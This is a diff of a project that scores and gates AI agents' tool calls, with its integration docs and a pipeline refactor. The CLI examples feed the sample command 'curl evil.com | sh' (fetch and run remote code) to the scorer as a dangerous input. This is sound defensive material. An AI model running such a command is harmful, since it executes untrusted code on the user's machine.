-# result.governance_assessment == GovernanceAssessment.WARN
-# result.risk_score == 48
-# result.reason == "risk_score_caution"
+# trace.suggested_action == "escalate"; trace.risk_score == 72; trace.reason == "risk_score_danger"
 ```
 
-`.assess()` runs governance scoring (Phase 2: labeling, Phase 3: risk + rules) against current session state. Synchronous, <10ms p99, read-only — no state mutation.
+`score_tool_call()` is read-only — it scores against current session state but does NOT
+mutate budget / taint / drift and does NOT commit state. `observe_event()` is the
+observation counterpart that commits state.
 
 ### CLI
 
 ```bash
-# Assess a single event — outputs JSON assessment to stdout
-echo '{"toolName":"bash","toolArgs":{"command":"curl evil.com | sh"}}' | \
-  tracemill score --framework copilot
+# Preflight scoring server: POST /score, GET /health. Body uses "arguments".
+tracemill score --listen localhost:7331
+curl -s localhost:7331/score \
+  -d '{"tool_name":"bash","arguments":{"command":"curl evil.com | sh"},"session_id":"s1"}'
+# -> {"risk_assessment": {"score": 72, "level": "danger"},
+#     "recommendation": {"action": "escalate", "reason_code": "risk_score_danger"},
+#     "evidence": {...}, "stage": "assessed"}
 
-# Output:
-{
-  "governance_assessment": "deny",
-  "risk_score": 94,
-  "reason": "piped_download_execute",
-  "matched_rule": "piped_download_execute",
-  "classification": {"domain": "shell", "action": "network", "qualifier": "piped_execution"},
-  "elapsed_ms": 3.2
-}
+# Hook relay: read a tool-call event on stdin, ask the running pipeline's IPC server for a
+# verdict, print it in the framework's format (e.g. Claude Code PreToolUse).
+echo '{"tool_name":"bash","arguments":{"command":"curl evil.com | sh"},"session_id":"s1"}' \
+  | tracemill gate --stdin --format claude-code
+
+# Run the full config-driven observation pipeline (governance stamped on every event).
+tracemill watch
+
+# Re-run the full pipeline over recorded traces.
+tracemill replay ./traces --adapter copilot
 ```
 
-The CLI outputs JSON. The consumer's script interprets it and maps to framework-specific responses.
+`tracemill score` serves read-only assessments; `tracemill gate` returns an enforced
+verdict from a pipeline that has a `GatePolicy` registered; `tracemill watch` / `replay`
+run the unified observe → structure → govern → sinks pipeline.
 
-### Consumer Examples
+### Integration Patterns
 
-The following are consumer-side examples showing how to wire tracemill assessments into framework hooks.
+How consumers wire the scoring stage and gating layer into framework hooks.
 
-#### Shell hook (Copilot CLI)
+#### In-process gating (SDK)
 
-`.github/hooks/preToolUse.sh` — **consumer's script**:
-```bash
-#!/bin/bash
-ASSESSMENT=$(tracemill assess --framework copilot)
-RECOMMENDATION=$(echo "$ASSESSMENT" | jq -r '.governance_assessment')
-
-case "$RECOMMENDATION" in
-  deny|transform)
-    echo '{"permissionDecision":"deny","permissionDecisionReason":"'$(echo "$ASSESSMENT" | jq -r '.reason')'"}'
-    exit 2
-    ;;
-  escalate)
-    # Escalation handling is consumer-defined
-    exit 2
-    ;;
-  *)
-    exit 0
-    ;;
-esac
-```
-
-#### Shell hook (Claude Code CLI)
-
-`.claude/settings.json` points to **consumer's script**:
-```bash
-#!/bin/bash
-ASSESSMENT=$(tracemill assess --framework claude)
-RECOMMENDATION=$(echo "$ASSESSMENT" | jq -r '.governance_assessment')
-[ "$RECOMMENDATION" = "deny" ] && exit 2
-exit 0
-```
-
-#### SDK callback (Copilot SDK)
+The SDK composes a `GatePolicy` (preflight/postflight callbacks returning a `Verdict`)
+onto the pipeline, then attaches it to a framework with one call:
 
 ```python
-from copilot.session import PermissionRequestResult
-from tracemill.governance.pipeline import GovernancePipeline
+from tracemill.sdk import Pipeline, GatePolicy, Verdict, ToolCallRequest, GateContext
 
-pipeline = GovernancePipeline.create()
+def preflight(request: ToolCallRequest, ctx: GateContext) -> Verdict:
+    if request.risk_score and request.risk_score > 60:
+        return Verdict.deny(f"score {request.risk_score} exceeds threshold")
+    return Verdict.allow()
 
-async def permission_handler(request, invocation):
-    result = pipeline.assess({
-        "tool_name": request.tool_name or request.kind,
-        "tool_input": {"command": request.full_command_text},
-        "session_id": invocation.session_id,
-    })
-    if result.governance_assessment.value in ("deny", "transform"):
-        return PermissionRequestResult(kind="reject")
-    if result.governance_assessment.value == "escalate":
-        decision = await ask_team_lead(result)
-        return decision
-    return PermissionRequestResult(kind="approve-once")
+policy = GatePolicy().preflight(preflight)
+pipeline = Pipeline.create(policy=policy)   # facade; gating enabled
+
+pipeline.gate_crewai()           # CrewAI hooks
+tool = pipeline.gate_langchain(tool)   # wrap a LangChain tool
+pipeline.gate_maf()              # Microsoft Agent Framework middleware
 ```
 
-#### SDK callback (Claude Code SDK)
+tracemill enforces the returned `Verdict` using each framework's native blocking
+mechanism. The optional postflight callback receives the tool output for audit. (The
+`gate_*` helpers also exist directly on `GovernancePipeline` for gating-only use.)
+
+#### Shell hook (Copilot / Claude Code CLI)
+
+The consumer's hook script pipes the tool-call event to `tracemill gate`, which relays it
+to the running pipeline's IPC server and prints a verdict in the framework's format:
+
+```bash
+#!/bin/bash
+# Claude Code PreToolUse hook — consumer's script
+echo "$TOOL_EVENT_JSON" | tracemill gate --stdin --format claude-code
+# the JSON/exit-code verdict is consumed by the agent's native hook contract
+```
+
+#### SDK callback (read-only)
+
+Consumers that prefer to interpret recommendations themselves can score and branch:
 
 ```python
-from claude_code_sdk import PermissionResultAllow, PermissionResultDeny
 from tracemill.governance.pipeline import GovernancePipeline
 
-pipeline = GovernancePipeline.create()
+gov = GovernancePipeline.create()
 
-async def can_use_tool(tool_name, input_data, context):
-    result = pipeline.assess({
+async def can_use_tool(tool_name, input_data, session_id):
+    trace = gov.score_tool_call({
         "tool_name": tool_name,
         "tool_input": input_data,
-        "session_id": context.session_id,
+        "session_id": session_id,
     })
-    if result.governance_assessment.value in ("deny", "escalate", "transform"):
-        return PermissionResultDeny(message=result.reason)
-    return PermissionResultAllow()
+    return trace.suggested_action not in ("deny", "escalate", "transform")
 ```
 
 ### What tracemill Owns vs What the Consumer Owns
 
 | tracemill | Consumer |
 |-----------|----------|
-| Observation pipeline (always-on) | Hook scripts |
-| Event parsing (framework mappings) | Enforcement logic (block/allow) |
-| Classification + risk scoring | Escalation flow (human-in-the-loop) |
-| Rule evaluation → `GovernanceAssessment` | Timeout handling |
-| Session state (taint, drift, budget) | Exit code mapping |
-| Storage (sinks: JSONL, SQLite) | Notification channels (Slack, email) |
-| `.assess()` API | Assessment → enforcement decision |
+| Observation pipeline (always-on) | Which events / sources to observe |
+| Event parsing (framework mappings) | Escalation flow (human-in-the-loop) |
+| Classification + risk scoring | Notification channels (Slack, email) |
+| Rule evaluation → `RecommendedAction` | Final authority over allow / deny |
+| Session state (taint, drift, budget) | Registering a `GatePolicy` (opt-in) |
+| Storage (sinks) | Audit retention policy |
+| `score_tool_call()` / `observe_event()` | Interpreting the assessment |
+| Opt-in `GatePolicy` → `Verdict` enforcement | Timeout / failure handling |
 
 ### The Single Flow
 
 ```
 1. Agent session starts
 2. tracemill observation pipeline starts (reads from configured source)
-3. Events stream in → Parse → Phase 1/2/3 → GovernanceAssessment
-   • State accumulates (taint, drift, budget) — ONLY on observed execution
-   • on_assessment callback fires (if registered)
-   • Sinks persist (always)
-4. IF consumer's hook fires (pre-execution):
-   a. Consumer's hook script/callback calls tracemill assess
-   b. Pipeline runs Phase 2/3 (read-only) against current session state
-   c. Returns AssessmentResult to consumer
-   d. Consumer maps assessment to allow/deny/escalate
-   e. Consumer returns decision to framework
-5. Observation pipeline continues:
-   • Allowed events: appear in source → Phase 1 mutates state → persist
-   • Denied events: never in source → no state mutation (budget stays accurate)
+3. Events stream in -> parse -> enrich -> classify -> structure -> govern (stage)
+   • Session state accumulates (taint, drift, budget) — ONLY on observed execution
+   • Each emitted event carries its SessionMeta on metadata.governance; sinks persist
+4. IF a gate is registered AND a pre-execution hook fires:
+   a. Hook relays the pending call (score_tool_call / tracemill gate)
+   b. Pipeline scores it read-only against current session state
+   c. GatePolicy maps the recommendation to a Verdict (allow / deny)
+   d. tracemill enforces via the framework's native mechanism
+5. Observation continues:
+   • Allowed events: appear in source -> state mutates -> persist
+   • Denied events: never in source -> no state mutation (budget stays accurate)
 ```
 
 ### Deduplication
 
-The `.assess()` call is **read-only** — it scores against accumulated state but does NOT mutate budget, taint, or drift. State changes only occur when the observation pipeline processes an event from its source (confirming execution):
+`score_tool_call()` is **read-only** — it scores against accumulated state but does NOT
+mutate budget, taint, or drift. State changes only occur when the observation pipeline
+processes an event from its source via `observe_event` (confirming execution):
 
-- **Allowed events:** Observation sees them naturally, processes Phase 1/2/3, commits state changes, persists to sinks.
-- **Denied events:** Never appear in source. The consumer should call `pipeline.record_blocked(payload, result)` *(future)* to emit a synthetic `tool.blocked` audit event to sinks.
+- **Allowed events:** observation sees them naturally, scores them, commits state, persists.
+- **Denied events:** never appear in the source, so they never mutate state.
 
-This design ensures that blocked calls never corrupt budget/taint state. The observation pipeline is the single source of truth for state mutations.
+Blocked calls therefore never corrupt budget/taint state. The observation pipeline is the
+single source of truth for state mutations.
 
 ### Configuration (`tracemill.yaml`)
 
-The `governance` section configures the scoring engine. Same shape in YAML and SDK:
+The `governance` section configures the scoring stage. Same shape in YAML and SDK:
 
 ```yaml
 # tracemill.yaml
@@ -1483,7 +1693,7 @@ SDK equivalent (no YAML needed):
 from tracemill.config import GovernanceConfig, BudgetConfig
 from tracemill.governance.pipeline import GovernancePipeline
 
-pipeline = GovernancePipeline.create(GovernanceConfig(
+gov = GovernancePipeline.create(GovernanceConfig(
     db_path="./tracemill.db",
     project_root=".",
     pii_scanning=True,
@@ -1491,94 +1701,72 @@ pipeline = GovernancePipeline.create(GovernanceConfig(
 ))
 ```
 
-Rules live in `recommendation_rules.yaml`. They produce assessments, not enforcement decisions.
-
-### Pipeline API
-
-```python
-from tracemill.governance.pipeline import GovernancePipeline
-from tracemill.config import GovernanceConfig
-
-class GovernancePipeline:
-    """Observation + assessment. No enforcement."""
-
-    @classmethod
-    def create(cls, config: GovernanceConfig | None = None) -> "GovernancePipeline":
-        """Construct from config. None = all defaults (in-memory, PII on, no budget caps)."""
-        ...
-
-    def assess(self, payload: dict) -> AssessmentResult:
-        """Read-only preflight assessment against current session state.
-
-        payload keys:
-            tool_name: str (required)
-            tool_input: dict (required)
-            session_id: str (required)
-            server_namespace: str (optional, for MCP tools)
-            project_root: str (optional)
-
-        Runs Phase 2/3 (labeling + risk/rules) → returns AssessmentResult.
-        Does NOT mutate session state (budget, taint, drift).
-        Does NOT persist to sinks.
-        """
-        ...
-```
+Rules live in `classify/data/recommendation_rules.yaml`. They produce recommendations, not
+enforcement decisions.
 
 ### Design Constraints
 
-1. **tracemill never decides** — it assesses. Enforcement is the consumer's responsibility.
-2. **No Verdict type** — tracemill has no concept of allow/deny as a binary decision.
-3. **No enforcement config** — no `gate.enabled`, no `escalate_policy`, no exit code mapping.
-4. **Assessment is always computed** — whether or not anyone calls `.assess()`, observation produces assessments for every event.
-5. **`.assess()` is read-only** — scores against accumulated state without mutating budget/taint/drift. State mutations only happen when observation confirms execution.
-6. **Session state is shared** — `.assess()` and observation share the same state snapshot for scoring. Observation alone commits mutations.
-7. **No framework dependencies** — tracemill never imports Copilot, Claude, LangGraph, etc.
-8. **Rules are data** — `governance_rules.yaml`. Turing-incomplete.
-9. **Callbacks are optional** — `on_assessment` is for consumers who want push. Sinks persist regardless.
+1. **Governance is one stage, not the whole pipeline** — it consumes enriched events and
+   scores them; observation, enrichment, and structuring are separate stages.
+2. **Observation-first by default** — with no `GatePolicy`, tracemill only recommends; the
+   consumer decides.
+3. **Enforcement is opt-in** — a registered `GatePolicy` yields a `Verdict`, enforced via
+   the framework's native mechanism. Final authority stays with the consumer.
+4. **Scoring is opt-in but uniform** — when the governance stage is enabled, every emitted
+   event gets a `SessionMeta`; when disabled, the backbone still observes and structures.
+5. **`score_tool_call()` is read-only** — it never mutates budget/taint/drift; only
+   `observe_event` (the stage) commits state.
+6. **Shared session state** — preflight scoring and observation share the same state
+   snapshot; observation alone commits mutations.
+7. **No framework dependencies in the core** — governance never imports Copilot, Claude,
+   LangGraph, etc.; the `gate_*` adapters wrap frameworks at the edge.
+8. **Rules are data** — `recommendation_rules.yaml`. Turing-incomplete.
+9. **Callbacks and gates are optional** — sinks persist regardless.
 
 ### Framework Compatibility
 
-| # | Platform | Hook type | Consumer calls | Gateable? |
-|---|----------|-----------|----------------|-----------|
-| 1 | **Copilot CLI** | Shell script | `tracemill assess --framework copilot` | ✓ |
-| 2 | **Copilot Cloud** | Shell script | Same | ✓ |
-| 3 | **Copilot SDK** | In-process | `pipeline.assess(payload)` | ✓ |
-| 4 | **Claude Code CLI** | Shell script | `tracemill assess --framework claude` | ✓ |
-| 5 | **Claude Code SDK** | In-process | `pipeline.assess(payload)` | ✓ |
-| 6 | **Cline** | Shell script | `tracemill assess --framework cline` | ✓ |
-| 7 | **OpenHands** | Shell script | `tracemill assess --framework openhands` | ✓ |
-| 8 | **Goose** | In-process | `pipeline.assess(payload)` | ✓ |
-| 9 | **OpenCode** | In-process | `pipeline.assess(payload)` | ✓ |
-| 10 | **LangGraph** | In-process | `pipeline.assess(payload)` | ✓ |
-| 11 | **CrewAI** | In-process | `pipeline.assess(payload)` | ✓ |
-| 12 | **PydanticAI** | In-process | `pipeline.assess(payload)` | ✓ |
-| 13 | **MAF / Semantic Kernel** | In-process | `pipeline.assess(payload)` | ✓ |
+| # | Platform | Hook type | Consumer entry point | Gateable? |
+|---|----------|-----------|----------------------|-----------|
+| 1 | **Copilot CLI** | Shell script | `tracemill gate --stdin` | ✓ |
+| 2 | **Copilot Cloud** | Shell script | `tracemill gate --stdin` | ✓ |
+| 3 | **Copilot SDK** | In-process | `pipeline.score_tool_call(...)` | ✓ |
+| 4 | **Claude Code CLI** | Shell script | `tracemill gate --stdin --format claude-code` | ✓ |
+| 5 | **Claude Code SDK** | In-process | `pipeline.score_tool_call(...)` | ✓ |
+| 6 | **Cline** | Shell script | `tracemill gate --stdin` | ✓ |
+| 7 | **OpenHands** | Shell script | `tracemill gate --stdin` | ✓ |
+| 8 | **Goose** | In-process | `pipeline.score_tool_call(...)` | ✓ |
+| 9 | **OpenCode** | In-process | `pipeline.score_tool_call(...)` | ✓ |
+| 10 | **LangGraph / LangChain** | In-process | `pipeline.gate_langchain(tool)` | ✓ |
+| 11 | **CrewAI** | In-process | `pipeline.gate_crewai()` | ✓ |
+| 12 | **PydanticAI** | In-process | `pipeline.gate_pydantic_ai(agent)` | ✓ |
+| 13 | **MAF / Semantic Kernel** | In-process | `pipeline.gate_maf()` | ✓ |
 | 14 | **Aider** | None | — | ✗ (observation only) |
-| 15 | **smolagents** | None | — | ✗ (observation only) |
+| 15 | **smolagents** | Class wrap | `pipeline.gate_smolagents()` | ✓ |
 | 16 | **SWE-agent** | None | — | ✗ (observation only) |
 
-Rows 14–16 have no pre-execution hook. tracemill observes and assesses their events, but no consumer can block tool calls.
+Rows 14 and 16 have no pre-execution hook. tracemill observes and scores their events, but
+no consumer can block their tool calls.
 
 ### File Structure
 
 ```
 src/tracemill/
-├── config/
-│   ├── models.py            # GovernanceConfig, BudgetConfig, TracemillConfig
-│   └── loader.py            # load_config() — reads tracemill.yaml
-├── governance/              # The engine (classification + rules + state)
-│   ├── pipeline.py          # GovernancePipeline (Phase 1/2/3, .assess(), .create())
+├── pipeline.py              # EventPipeline — observation backbone + governance stage
+├── enricher.py              # Classification + risk enrichment
+├── trace.py                 # EventTrace, TraceStage (unified record)
+├── governance/              # The scoring stage + gating engine
+│   ├── pipeline.py          # GovernancePipeline (score_tool_call, observe_event, gate_*)
+│   ├── results.py           # RecommendedAction, RiskRecommendation, SessionMeta
 │   ├── rules.py             # Rule, Predicate, evaluate_rules()
 │   ├── labeler.py           # GovernanceLabeler
 │   ├── state.py             # SessionState (taint, budget, drift)
-│   └── ...
-├── assess/                  # Public assessment types
-│   ├── __init__.py          # AssessmentResult, GovernanceAssessment
-│   ├── types.py             # Dataclasses
-│   └── assessor.py          # assess() implementation (stateless)
-├── classify/                # Classification engine
-├── sinks/                   # Storage backends (JSONL, SQLite, S3)
-└── mappings/                # Framework YAML definitions
+│   └── ...                  # pii, ifc, integrity, drift, budget, observer, persistence
+├── sdk/                     # Pipeline facade + GatePolicy + Verdict + gates
+│   └── pipeline.py          # Pipeline — backbone + governance stage + gating delegates
+├── gate/                    # Cross-process gate IPC (tracemill gate)
+├── gates/                   # Bundled detectors (PII)
+├── classify/                # Classification engine + data/recommendation_rules.yaml
+└── sinks/                   # Storage backends
 ```
 
 ---

--- a/src/tracemill/cli/replay.py
+++ b/src/tracemill/cli/replay.py
@@ -41,7 +41,10 @@ async def _replay(source: Path, adapter_name: str, output_path: str | None) -> N
     from tracemill.adapters.mapped_json import MappedJsonAdapter
     from tracemill.cli.factory import create_default_pipeline
     from tracemill.cli.runner import load_mapping_path
+    from tracemill.enricher import Enricher
     from tracemill.governance.persistence import SystemStore
+    from tracemill.pipeline import EventPipeline
+    from tracemill.sinks.callback import CallbackSink
     from tracemill.sinks.console import ConsoleSink
     from tracemill.sinks.jsonl import JsonlSink
 
@@ -49,17 +52,33 @@ async def _replay(source: Path, adapter_name: str, output_path: str | None) -> N
     db_path = Path.home() / ".tracemill" / "system.db"
     db_path.parent.mkdir(parents=True, exist_ok=True)
     store = SystemStore(db_path)
-    pipeline = create_default_pipeline(store)
+    governance = create_default_pipeline(store)
 
     # Load adapter
     mapping_path = load_mapping_path(adapter_name)
     adapter = MappedJsonAdapter.from_yaml(str(mapping_path), session_id="replay")
 
-    # Set up sink
+    # Output sink
     if output_path:
-        sink = JsonlSink(base_path=Path(output_path))
+        output_sink = JsonlSink(path=Path(output_path))
     else:
-        sink = ConsoleSink(filter_actions=None, color=True)
+        output_sink = ConsoleSink(filter_actions=None, color=True)
+
+    # Count governed events as the unified pipeline stamps and emits them.
+    total_governed = 0
+
+    async def _count(event) -> None:
+        nonlocal total_governed
+        if event.metadata is not None and event.metadata.governance is not None:
+            total_governed += 1
+
+    # Unified pipeline: adapt -> enrich -> classify -> govern (stage) -> sinks, so
+    # governance is one stage and each emitted event carries metadata.governance.
+    event_pipeline = EventPipeline(
+        sinks=[output_sink, CallbackSink(on_event=_count)],
+        enricher=Enricher(),
+        governance=governance,
+    )
 
     # Collect files to process
     files: list[Path] = []
@@ -69,7 +88,6 @@ async def _replay(source: Path, adapter_name: str, output_path: str | None) -> N
         files = [source]
 
     total_events = 0
-    total_governed = 0
 
     for f in files:
         click.echo(f"Processing: {f.name}")
@@ -95,13 +113,12 @@ async def _replay(source: Path, adapter_name: str, output_path: str | None) -> N
             except json.JSONDecodeError:
                 continue
 
-            events = list(adapter.parse_dict(data))
-            for event in events:
+            for event in adapter.parse_dict(data):
                 total_events += 1
-                pipeline.process_event(event)
-                if event.metadata and event.metadata.governance:
-                    total_governed += 1
-                await sink.emit(event)
+                await event_pipeline.push(event)
+
+    # Flush buffered (unpaired tool-start) events, then close sinks.
+    await event_pipeline.close()
 
     click.echo(f"\nReplay complete: {total_events} events, {total_governed} governed")
     store.close()

--- a/src/tracemill/cli/replay.py
+++ b/src/tracemill/cli/replay.py
@@ -89,36 +89,42 @@ async def _replay(source: Path, adapter_name: str, output_path: str | None) -> N
 
     total_events = 0
 
-    for f in files:
-        click.echo(f"Processing: {f.name}")
-        content = f.read_text(encoding="utf-8")
+    try:
+        for f in files:
+            click.echo(f"Processing: {f.name}")
+            content = f.read_text(encoding="utf-8")
 
-        # Handle JSONL (line-delimited) vs single JSON
-        if f.suffix == ".jsonl":
-            lines = [l.strip() for l in content.splitlines() if l.strip()]
-        else:
-            # Single JSON file — try as array or single object
-            try:
-                parsed = json.loads(content)
-                lines = (
-                    [json.dumps(item) for item in parsed] if isinstance(parsed, list) else [content]
-                )
-            except json.JSONDecodeError:
-                click.echo(f"  Skipping (invalid JSON): {f.name}", err=True)
-                continue
+            # Handle JSONL (line-delimited) vs single JSON
+            if f.suffix == ".jsonl":
+                lines = [l.strip() for l in content.splitlines() if l.strip()]
+            else:
+                # Single JSON file — try as array or single object
+                try:
+                    parsed = json.loads(content)
+                    lines = (
+                        [json.dumps(item) for item in parsed]
+                        if isinstance(parsed, list)
+                        else [content]
+                    )
+                except json.JSONDecodeError:
+                    click.echo(f"  Skipping (invalid JSON): {f.name}", err=True)
+                    continue
 
-        for line in lines:
-            try:
-                data = json.loads(line)
-            except json.JSONDecodeError:
-                continue
+            for line in lines:
+                try:
+                    data = json.loads(line)
+                except json.JSONDecodeError:
+                    continue
 
-            for event in adapter.parse_dict(data):
-                total_events += 1
-                await event_pipeline.push(event)
-
-    # Flush buffered (unpaired tool-start) events, then close sinks.
-    await event_pipeline.close()
+                for event in adapter.parse_dict(data):
+                    total_events += 1
+                    await event_pipeline.push(event)
+    finally:
+        # Flush buffered (unpaired tool-start) events and release resources even
+        # if processing raised, so the Enricher buffer is never silently dropped.
+        try:
+            await event_pipeline.close()
+        finally:
+            store.close()
 
     click.echo(f"\nReplay complete: {total_events} events, {total_governed} governed")
-    store.close()

--- a/src/tracemill/cli/watch.py
+++ b/src/tracemill/cli/watch.py
@@ -14,6 +14,7 @@ import yaml
 
 from tracemill.cli.runner import (
     ResolvedPipeline,
+    load_mapping_path,
     resolve_pipelines,
     watch_directory,
     watch_jsonl_file,
@@ -173,87 +174,117 @@ async def _run_once(
 
 
 async def _watch_pipeline(pipeline: ResolvedPipeline, governance: "GovernancePipeline") -> None:
-    """Watch a single pipeline's source and process events."""
+    """Watch a single pipeline's source and feed events through the unified pipeline."""
     logger.info("Starting watcher for %s at %s", pipeline.name, pipeline.source_path)
 
-    if pipeline.source_path.is_dir():
-        # Watch directory for JSONL files
-        pattern = "*.jsonl" if pipeline.name != "continue" else "*.json"
-        async for file_path, line in watch_directory(pipeline.source_path, pattern=pattern):
-            await _process_line(line, pipeline, governance)
-    elif pipeline.source_path.is_file():
-        # Watch single file
-        async for line in watch_jsonl_file(pipeline.source_path, start_at="end"):
-            await _process_line(line, pipeline, governance)
-    else:
+    if not (pipeline.source_path.is_dir() or pipeline.source_path.is_file()):
         logger.warning("Source path does not exist: %s", pipeline.source_path)
+        return
+
+    adapter, event_pipeline = _build_pipeline_runtime(pipeline, governance)
+    try:
+        if pipeline.source_path.is_dir():
+            # Watch directory for JSONL files
+            pattern = "*.jsonl" if pipeline.name != "continue" else "*.json"
+            async for _file_path, line in watch_directory(pipeline.source_path, pattern=pattern):
+                await _feed_line(line, adapter, event_pipeline)
+        else:
+            # Watch single file
+            async for line in watch_jsonl_file(pipeline.source_path, start_at="end"):
+                await _feed_line(line, adapter, event_pipeline)
+    finally:
+        # Emit any buffered (unpaired tool-start) events and release sink resources.
+        await event_pipeline.close()
 
 
 async def _process_pipeline_once(
     pipeline: ResolvedPipeline, governance: "GovernancePipeline"
 ) -> None:
-    """Process existing content in a pipeline's source (no watching)."""
+    """Process existing content in a pipeline's source once (no watching)."""
     logger.info("Processing %s at %s", pipeline.name, pipeline.source_path)
 
-    if pipeline.source_path.is_dir():
-        pattern = "*.jsonl" if pipeline.name != "continue" else "*.json"
-        for f in pipeline.source_path.rglob(pattern):
-            if f.is_file():
-                for line in f.read_text(encoding="utf-8").splitlines():
-                    stripped = line.strip()
-                    if stripped:
-                        await _process_line(stripped, pipeline, governance)
-    elif pipeline.source_path.is_file():
-        for line in pipeline.source_path.read_text(encoding="utf-8").splitlines():
-            stripped = line.strip()
-            if stripped:
-                await _process_line(stripped, pipeline, governance)
+    if not (pipeline.source_path.is_dir() or pipeline.source_path.is_file()):
+        return
+
+    adapter, event_pipeline = _build_pipeline_runtime(pipeline, governance)
+    try:
+        if pipeline.source_path.is_dir():
+            pattern = "*.jsonl" if pipeline.name != "continue" else "*.json"
+            for f in pipeline.source_path.rglob(pattern):
+                if f.is_file():
+                    for line in f.read_text(encoding="utf-8").splitlines():
+                        stripped = line.strip()
+                        if stripped:
+                            await _feed_line(stripped, adapter, event_pipeline)
+        else:
+            for line in pipeline.source_path.read_text(encoding="utf-8").splitlines():
+                stripped = line.strip()
+                if stripped:
+                    await _feed_line(stripped, adapter, event_pipeline)
+    finally:
+        await event_pipeline.close()
 
 
-async def _process_line(
-    line: str, pipeline: ResolvedPipeline, governance: "GovernancePipeline"
-) -> None:
-    """Parse a raw line through the adapter and governance pipeline."""
-    from tracemill.adapters.mapped_json import MappedJsonAdapter
-    from tracemill.cli.runner import load_mapping_path
+def _build_sinks(pipeline: ResolvedPipeline) -> list:
+    """Instantiate the configured sink objects for a resolved pipeline (once)."""
     from tracemill.sinks.console import ConsoleSink
     from tracemill.sinks.jsonl import JsonlSink
     from tracemill.sinks.sqlite_output import SqliteOutputSink
 
+    sinks: list = []
+    for sink_config in pipeline.sinks:
+        sink_type = getattr(sink_config, "type", None)
+        if sink_type == "console":
+            sinks.append(
+                ConsoleSink(
+                    filter_actions=getattr(sink_config, "filter", None),
+                    color=getattr(sink_config, "color", True),
+                )
+            )
+        elif sink_type == "sqlite":
+            sinks.append(SqliteOutputSink(path=sink_config.path))
+        elif sink_type == "jsonl":
+            sinks.append(JsonlSink(path=sink_config.path))
+        else:
+            logger.warning("Unknown sink type %r in pipeline %s", sink_type, pipeline.name)
+    return sinks
+
+
+def _build_pipeline_runtime(pipeline: ResolvedPipeline, governance: "GovernancePipeline"):
+    """Build the ``(adapter, EventPipeline)`` runtime for a resolved pipeline.
+
+    The daemon runs the same unified pipeline as the SDK: adapt -> enrich ->
+    classify -> govern -> sinks, with ``governance`` wired in as a *stage* so every
+    emitted event carries ``metadata.governance``. Governance is one stage here, not
+    the pipeline itself. The shared governance engine also backs the Gate/Score IPC
+    servers, so session budget/drift state stays unified across observation and
+    preflight. Live ML structuring (phase + boundary labeling) is enabled by
+    default, matching the SDK ``Pipeline``.
+    """
+    from tracemill.adapters.mapped_json import MappedJsonAdapter
+    from tracemill.enricher import Enricher
+    from tracemill.pipeline import EventPipeline
+
+    mapping_path = load_mapping_path(pipeline.adapter.mapping)
+    adapter = MappedJsonAdapter.from_yaml(str(mapping_path), session_id=pipeline.name)
+    event_pipeline = EventPipeline(
+        sinks=_build_sinks(pipeline),
+        enricher=Enricher(),
+        governance=governance,
+    )
+    return adapter, event_pipeline
+
+
+async def _feed_line(line: str, adapter, event_pipeline) -> None:
+    """Parse one raw line and push each resulting event through the pipeline."""
     try:
         data = json.loads(line)
     except json.JSONDecodeError:
-        logger.debug("Skipping non-JSON line in %s", pipeline.name)
+        logger.debug("Skipping non-JSON line")
         return
 
-    # Adapt raw data to SessionEvent
-    mapping_path = load_mapping_path(pipeline.adapter.mapping)
-    adapter = MappedJsonAdapter.from_yaml(str(mapping_path), session_id=pipeline.name)
-    events = list(adapter.parse_dict(data))
-
-    for event in events:
-        # Run through governance (bridge SessionEvent → EnrichmentContext)
-        ctx = governance.context_from_session_event(event)
-        governance.process_event(ctx)
-
-        # Emit to sinks
-        for sink_config in pipeline.sinks:
-            try:
-                sink_type = getattr(sink_config, "type", None)
-                if sink_type == "console":
-                    sink = ConsoleSink(
-                        filter_actions=getattr(sink_config, "filter", None),
-                        color=getattr(sink_config, "color", True),
-                    )
-                    await sink.emit(event)
-                elif sink_type == "sqlite":
-                    sink = SqliteOutputSink(path=sink_config.path)
-                    await sink.emit(event)
-                elif sink_type == "jsonl":
-                    sink = JsonlSink(base_path=sink_config.path)
-                    await sink.emit(event)
-            except Exception as exc:
-                logger.warning("Sink error (%s): %s", sink_config, exc)
+    for event in adapter.parse_dict(data):
+        await event_pipeline.push(event)
 
 
 def _load_config(config_path: str | None) -> dict | None:

--- a/src/tracemill/enricher.py
+++ b/src/tracemill/enricher.py
@@ -38,7 +38,7 @@ class Enricher:
                 config_path is provided, the default discovery chain is used.
         """
         self._custom_classifications = custom_classifications
-        self._pending: dict[str, SessionEvent] = {}
+        self._pending: dict[tuple[str, str], SessionEvent] = {}
 
         # Build engine eagerly so config errors surface at construction time
         if config is not None:
@@ -52,17 +52,32 @@ class Enricher:
         """Enrich a single event. Returns None if event is buffered (tool_start waiting
         for its tool_complete pair). Returns enriched event when ready. May return a list
         if a displaced orphan start needs to be emitted alongside buffering a new start."""
+        if event.metadata is None:
+            # Defensive: SessionEvent defaults metadata to EventMetadata(), but a
+            # model_construct-built event may carry None. Normalize up front so the
+            # pairing/classification helpers below never raise — a raise here would
+            # push the raw event straight to sinks and bypass the exactly-once
+            # tool-call pairing guarantee the downstream governance stage relies on.
+            event = event.model_copy(update={"metadata": EventMetadata()})
         if event.kind == EventKind.TOOL_CALL_STARTED:
             event = self._classify(event)
             event = self._set_visibility(event)
             event = self._set_phase(event)
             tool_call_id = _extract_tool_call_id(event)
             if tool_call_id:
-                displaced = self._pending.pop(tool_call_id, None)
-                self._pending[tool_call_id] = event
+                # Key pending starts by (session_id, tool_call_id): a single
+                # Enricher instance serves interleaved sessions, and tool_call_ids
+                # are only unique within a session. Keying on the id alone lets
+                # one session's start displace another's and lets a completion
+                # pair across sessions — double-scoring one real call.
+                key = (event.session_id, tool_call_id)
+                displaced = self._pending.pop(key, None)
+                self._pending[key] = event
                 if displaced is not None:
                     logger.warning(
-                        "Duplicate TOOL_START for tool_call_id=%s; emitting previous as orphan",
+                        "Duplicate TOOL_START for session_id=%s tool_call_id=%s; "
+                        "emitting previous as orphan",
+                        event.session_id,
                         tool_call_id,
                     )
                     orphan_metadata = displaced.metadata.model_copy(update={"duration_ms": None})
@@ -72,7 +87,9 @@ class Enricher:
 
         if event.kind == EventKind.TOOL_CALL_COMPLETED:
             tool_call_id = _extract_tool_call_id(event)
-            start_event = self._pending.get(tool_call_id) if tool_call_id else None
+            start_event = (
+                self._pending.get((event.session_id, tool_call_id)) if tool_call_id else None
+            )
 
             if start_event is not None:
                 duration_ms = _compute_duration_ms(start_event.timestamp, event.timestamp)
@@ -90,13 +107,32 @@ class Enricher:
                 event = event.model_copy(
                     update={"payload": merged_payload, "metadata": merged_metadata}
                 )
